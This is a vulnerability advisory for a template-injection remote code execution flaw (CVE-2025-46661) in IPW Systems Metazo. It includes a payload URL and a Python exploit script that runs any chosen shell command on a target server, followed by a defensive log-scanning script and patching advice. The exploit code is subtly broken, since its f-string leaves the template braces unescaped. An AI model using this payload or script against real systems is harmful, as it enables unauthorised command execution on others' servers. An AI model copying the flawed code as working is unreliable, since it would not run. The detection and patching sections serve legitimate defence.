A critical vulnerability with a CVSSv3 score of 9.8 has been discovered in IPW Systems Metazo through 8.1.3. It allows unauthenticated remote code execution (RCE). The cause is a server-side template injection issue in the smartyValidator.php file, which lets an attacker supply arbitrary template expressions to the Smarty templating engine. The vendor, IPW Systems, has patched the vulnerability.

Affected Products

IPW Systems Metazo versions up to and including 8.1.3.

Vulnerability Details

The vulnerability exists in the smartyValidator.php file, specifically in the IPW_AXAJ_Utility::isAjaxRequest(), IPW_AjaxProcessor::initiate(), and IPW_AjaxProcessor::_run() methods. Insecure handling of user input allows an attacker to inject custom Smarty template expressions, leading to remote code execution.

To successfully exploit this vulnerability, an attacker must send a specially crafted HTTP request with the payload to the target server. An example payload could look like this:

http://target-server/smartyValidator.php?action=IPW_AjaxProcessor.initiate&template={$some_var=print(shell_exec('id'))}

Exploit Code Snippet

The following is a basic example of a Python script that can be used to exploit vulnerable instances of IPW Systems Metazo through 8.1.3:

import requests

def exploit_metazo(target_url, command_to_execute):
    payload = f"{$some_var=print(shell_exec('{command_to_execute}'))}"
    params = {"action": "IPW_AjaxProcessor.initiate", "template": payload}
    
    try:
        response = requests.get(target_url + "/smartyValidator.php", params=params)
        if response.status_code == 200:
            print("Exploit executed successfully!")
            print(response.text)
        else:
            print(f"Error executing exploit: HTTP status {response.status_code}")
    except Exception as e:
        print("Error executing exploit:")
        print(str(e))

if __name__ == "__main__":
    target_url = "http://target-server";  # Change this to the target server URL
    command_to_execute = "id"  # Change this to the command you want to execute
    exploit_metazo(target_url, command_to_execute)

Vendor Response

IPW Systems has acknowledged the issue and released a patch to mitigate the vulnerability in all instances running Metazo. Users are advised to contact their supplier for an updated version or follow the instructions provided by IPW Systems to update their platform to version 8.1.4 or later.

Original References

- CVE-2025-46661
- IPW Systems Security Advisory

Recommendations

- Update the IPW Systems Metazo to the latest version (8.1.4 or later) as soon as possible to mitigate the risk of remote code execution.

- Monitor any logs for unusual activity that may indicate attempts to exploit this vulnerability.

- Implement a system of regular security audits to ensure that your systems are up to date with the latest patches and security best practices.
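
To support the log-monitoring recommendation above, the following is an added example (not part of the original advisory and not vendor code) that scans web server access logs for requests to smartyValidator.php whose query parameters contain Smarty template tags. It assumes Combined Log Format; the sample log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed log layout: ip - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Smarty's default delimiters are { and }; tags open as {$var, {if, {/if or {*
SMARTY_TAG = re.compile(r'\{\s*[$/\w*]')
ENDPOINT = "/smartyvalidator.php"

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """
203.0.113.7 - - [28/Apr/2025:13:20:01 +0000] "GET /smartyValidator.php?action=IPW_AjaxProcessor.initiate&template=%7B%24some_var%3Dprint(shell_exec('id'))%7D HTTP/1.1" 200 512
198.51.100.23 - - [28/Apr/2025:13:21:44 +0000] "GET /smartyValidator.php?action=IPW_AjaxProcessor.initiate&template=%257B%2524x%257D HTTP/1.1" 500 0
192.0.2.10 - - [28/Apr/2025:13:22:03 +0000] "GET /smartyValidator.php?action=validate&field=email HTTP/1.1" 200 48
192.0.2.10 - - [28/Apr/2025:13:22:09 +0000] "GET /index.php?q=%7Bfoo%7D HTTP/1.1" 200 901
""".strip().splitlines()

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %257B -> %7B -> {), bounded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return one record per request to the endpoint carrying a Smarty tag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        url = urlsplit(m["target"])
        if not url.path.lower().endswith(ENDPOINT):
            continue
        # parse_qsl decodes once; fully_decode catches double encoding
        params = parse_qsl(url.query, keep_blank_values=True)
        flagged = [k for k, v in params if SMARTY_TAG.search(fully_decode(v))]
        if flagged:
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "status": int(m["status"]), "params": flagged})
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so parameters sent in a request body will not appear here and need request-body logging or an equivalent rule at a reverse proxy or WAF.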

Conclusion

In conclusion, CVE-2025-46661 is a dangerous vulnerability in IPW Systems Metazo through 8.1.3 that enables an attacker to remotely execute code without needing to authenticate. This potentially allows the attacker full access to the underlying system. IPW Systems has since patched the vulnerability, and it is recommended that affected users update their systems as soon as possible to protect against this threat.

Timeline

Published on: 04/28/2025 13:15:24 UTC
Last modified on: 04/29/2025 13:52:10 UTC